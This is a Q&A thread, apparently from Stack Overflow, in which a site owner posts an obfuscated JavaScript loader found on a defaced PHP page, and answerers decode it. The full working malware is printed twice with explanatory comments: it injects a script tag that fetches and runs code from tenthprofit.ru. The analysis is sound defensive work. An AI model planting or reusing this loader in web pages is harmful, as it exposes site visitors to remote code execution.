Reputation: 1791
This script was added to a defaced web page of a client's website running PHP. I have no clue what this script can do, and I do not know whether it is really malicious. Can someone advise? Please find the code below:
// ANALYSIS NOTES (comments only; every code line below is left exactly as found).
// Decoded behaviour of this obfuscated sample:
//   1. H() assembles a URL path, a port number and a few DOM names from string
//      fragments, then assigns the outer variable h a function.
//   2. h is installed as window.onload. When it runs it creates a <script>
//      element, sets its src to
//        hxxp://tenthprofit[.]ru:8080/google.com/abc.go.com/terra.com.br.php
//      sets defer to 1 and appends the element to document.body.
//   3. Whatever that URL returns is then executed by the browser in the context
//      of the page; nothing in this listing inspects or restricts it.
// Every assignment that carries no comment below (numeric counters, empty
// objects and arrays, this.* properties, unused String/Date/Array objects) is
// never read anywhere in this listing; they look like filler added to vary the
// script's text. Names assigned without `var` become implicit globals.
// NOTE(review): the script tag is only the visible symptom. It does not show
// how the page was modified, so removing it does not close that path.
var GU = '';
// h is declared here and given its function body inside H(); it is the payload.
var h;
var X = new String();
var mP = "";
H = function () {
var F = ["hu"];
// L(str, start, len): thin wrapper around substr, used to cut the real text
// out of strings padded with throwaway characters.
function L(Lc, O, d) {
return Lc.substr(O, d);
}
OH = 55345;
OH -= 37;
// x aliases document so the later DOM calls never contain the word "document".
var x = document;
QM = 6929;
QM++;
q = 25298;
q -= 65;
// t is the empty replacement string used by y() below.
var t = '';
var vs = {};
var u = ["hR"];
// Oi aliases RegExp for the same reason x aliases document.
var Oi = RegExp;
var A = {
kh: "LQ"
};
// v decodes to "/google.com/abc.go.com/terra.com.br.php". The well-known
// domain names are only path segments of the URL; the host is set later.
var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
yz = {
Ec: false
};
// y(text, junkChars): builds the character class "[" + junkChars + "]" as a
// global RegExp and deletes every matching character from text. This is the
// string decoder for the DOM names used by h().
function y(Lc, O) {
hI = 24414;
hI++;
g = {};
a = 28529;
a--;
// L("[n0jJ", 0, 1) is "[", so d is "[<junkChars>]".
var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
var m = new Oi(d, String("g"));
n = {
kW: 40818
};
ly = {
HN: false
};
return Lc.replace(m, t);
};
ZW = 9686;
ZW -= 202;
GE = 56525;
GE -= 235;
D = ["u_", "QP"];
var E = null;
var vd = {
ka: "J"
};
var Jn = new Date();
Xg = {
V: 51919
};
// 751407 - 743327 = 8080, the TCP port that ends up in the URL.
var l = 751407 - 743327;
try {} catch (U) {};
// W is the property name used to reach document.body.
var W = new String("body");
var qi = "qi";
this.Vf = 38797;
this.Vf--;
// P decodes to "script" (the tag name passed to createElement).
var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
var RlE = 58536;
var Xx = false;
this.jo = '';
vi = 41593;
vi--;
// Payload. Assigned to the outer h, so it stays reachable after H() returns.
h = function () {
// Everything runs inside try/catch; the catch body only sets filler
// properties, so any failure is silent.
try {
var YU = new String();
var DY = "";
// dY decodes to "createElement".
var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
CN = {
_Y: 63379
};
// Equivalent to document.createElement("script"); s is an implicit global.
s = x[dY](P);
var fH = "fH";
pI = 33929;
pI--;
Uw = [];
// G decodes to "src".
var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
var Wg = [];
// Number + String object concatenates: "8080/google.com/abc.go.com/terra.com.br.php".
var Lc = l + v;
var yW = new String();
var iO = new String();
// Oe is "defer".
var Oe = String("defe" + "r");
var Et = ["qO", "AF"];
var QX = 13548;
// The String argument decodes to "http://tenthprofit.ru:"; with Lc appended
// the element's src becomes
// hxxp://tenthprofit[.]ru:8080/google.com/abc.go.com/terra.com.br.php
s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
PA = {};
// [2, 1][1] is 1, so this sets s.defer = 1.
s[Oe] = [2, 1][1];
this.Vt = "Vt";
var ho = 46131;
try {
var kn = 'cI'
} catch (kn) {};
this.ww = 27193;
this.ww += 97;
// Equivalent to document.body.appendChild(s): this is the point at which the
// browser is told to fetch and run the remote script.
x[W].appendChild(s);
this.yk = 60072;
this.yk++;
var Lp = new Date();
} catch (PY) {
this.ku = 43483;
this.ku++;
this.ra = 47033;
this.ra--;
this.ru = "ru";
};
var lu = new Array();
var me = new String();
};
};
YB = ["LB", "uM"];
var AI = {
Vm: 4707
};
// Runs the setup immediately: decodes the strings and defines h. No DOM change yet.
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
// Installs the payload as the load handler. Plain assignment, so any onload
// handler the page had set earlier is replaced.
window.onload = h;
var PQ = false;
var mF = {
Hm: false
};
try {
var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";
Upvotes: 1
Views: 1030
Reputation: 498
Here is the "beautified script":
// ANALYSIS NOTES (comments only; the code is unchanged).
// Summary: H() decodes a handful of strings and defines h(); h() is set as
// window.onload and injects a <script> element whose src is
//   hxxp://tenthprofit[.]ru:8080/google.com/abc.go.com/terra.com.br.php
// into document.body. The response from that host would run with the page's
// privileges. Uncommented assignments are never read in this listing and
// appear to be padding; those written without `var` create implicit globals.
var GU = '';
// Receives the payload function inside H().
var h;
var X = new String();
var mP = "";
H = function () {
var F = ["hu"];
// Substring helper: returns d characters of Lc starting at offset O.
function L(Lc, O, d) {
return Lc.substr(O, d);
}
OH = 55345;
OH -= 37;
// Alias for document.
var x = document;
QM = 6929;
QM++;
q = 25298;
q -= 65;
// Empty string used as the replacement in y().
var t = '';
var vs = {};
var u = ["hR"];
// Alias for the RegExp constructor.
var Oi = RegExp;
var A = {
kh: "LQ"
};
// Decodes to the URL path "/google.com/abc.go.com/terra.com.br.php".
// These familiar names sit in the path, not in the host part.
var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
yz = {
Ec: false
};
// Decoder: removes from Lc every character that appears in O, by wrapping O
// in "[" ... "]" and using it as a global regular expression.
function y(Lc, O) {
hI = 24414;
hI++;
g = {};
a = 28529;
a--;
// First character of "[n0jJ" is "[", giving the character class "[...]".
var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
var m = new Oi(d, String("g"));
n = {
kW: 40818
};
ly = {
HN: false
};
return Lc.replace(m, t);
};
ZW = 9686;
ZW -= 202;
GE = 56525;
GE -= 235;
D = ["u_", "QP"];
var E = null;
var vd = {
ka: "J"
};
var Jn = new Date();
Xg = {
V: 51919
};
// Evaluates to 8080 (the port).
var l = 751407 - 743327;
try {} catch (U) {};
// Key used to look up document.body.
var W = new String("body");
var qi = "qi";
this.Vf = 38797;
this.Vf--;
// Decodes to "script".
var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
var RlE = 58536;
var Xx = false;
this.jo = '';
vi = 41593;
vi--;
// The load handler that performs the injection.
h = function () {
// Errors are caught and discarded by the catch block further down.
try {
var YU = new String();
var DY = "";
// Decodes to "createElement".
var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
CN = {
_Y: 63379
};
// document.createElement("script"), stored in the implicit global s.
s = x[dY](P);
var fH = "fH";
pI = 33929;
pI--;
Uw = [];
// Decodes to "src".
var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
var Wg = [];
// String concatenation of the port and the path: "8080/google.com/...php".
var Lc = l + v;
var yW = new String();
var iO = new String();
// "defer".
var Oe = String("defe" + "r");
var Et = ["qO", "AF"];
var QX = 13548;
// Sets s.src: "http://tenthprofit.ru:" followed by Lc, i.e.
// hxxp://tenthprofit[.]ru:8080/google.com/abc.go.com/terra.com.br.php
s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
PA = {};
// Sets s.defer to 1 (second element of [2, 1]).
s[Oe] = [2, 1][1];
this.Vt = "Vt";
var ho = 46131;
try {
var kn = 'cI'
} catch (kn) {};
this.ww = 27193;
this.ww += 97;
// document.body.appendChild(s): inserts the tag, which triggers the remote load.
x[W].appendChild(s);
this.yk = 60072;
this.yk++;
var Lp = new Date();
} catch (PY) {
this.ku = 43483;
this.ku++;
this.ra = 47033;
this.ra--;
this.ru = "ru";
};
var lu = new Array();
var me = new String();
};
};
YB = ["LB", "uM"];
var AI = {
Vm: 4707
};
// Setup call: decodes strings and defines h; nothing is injected at this point.
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
// Registers h to run on page load, overwriting any previously assigned onload handler.
window.onload = h;
var PQ = false;
var mF = {
Hm: false
};
try {
var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";
I think that this line in particular is a bit creepy:
s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
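It sets `s[G]` to a URL on tenthprofit.ru. Here `s` is the newly created `<script>` element and `G` decodes to `src`, so this is the line that points the injected tag at the remote host.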
Upvotes: 1
Reputation: 27875
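This script adds a new `<script>` element to the body of the HTML page and sets its `src` attribute to "tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php", so the browser tries to load and run whatever that URL returns. It's been taken down, so it should be harmless by now. The injected code should still be removed from the page, because it would become active again if that host started serving content.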
The following line is appended to the end of the BODY element:
<script src="http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"></script>
Upvotes: 3
Reputation: 10340
Yes, this is certainly malicious. It tries to look like a part of Google by building a URL path that begins with /google.com/:
new String("/goo" + "gle." + L("com/DyBg", 0, 4)
But it actually does something (redirect / information gathering) on tenthprofit.ru:
new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
The best course is to save a copy of this code and then delete it from the page.
Also, to make it more readable you can run it through Jsbeautifier.
Upvotes: 5
Reputation:
Well, by definition it is malicious, as it was added as part of a defacement. It appears to redirect people to tenthprofit.ru, but I haven't run it, so that's based on a cursory inspection of the (obfuscated) code.
Upvotes: 0
Reputation: 1280
If you want your question answered, I guess you need to format your code so that it is more human-readable.
Something like this: How to scroll the horizontal scrollbar in an iFrame from the parent frame?
Edit
Also, it looks like your "malicious" script broke the SO site. It is certainly malicious.
Upvotes: 0
Reputation: 188024
If you didn't add it, well, then it certainly classifies as malicious.
Upvotes: 7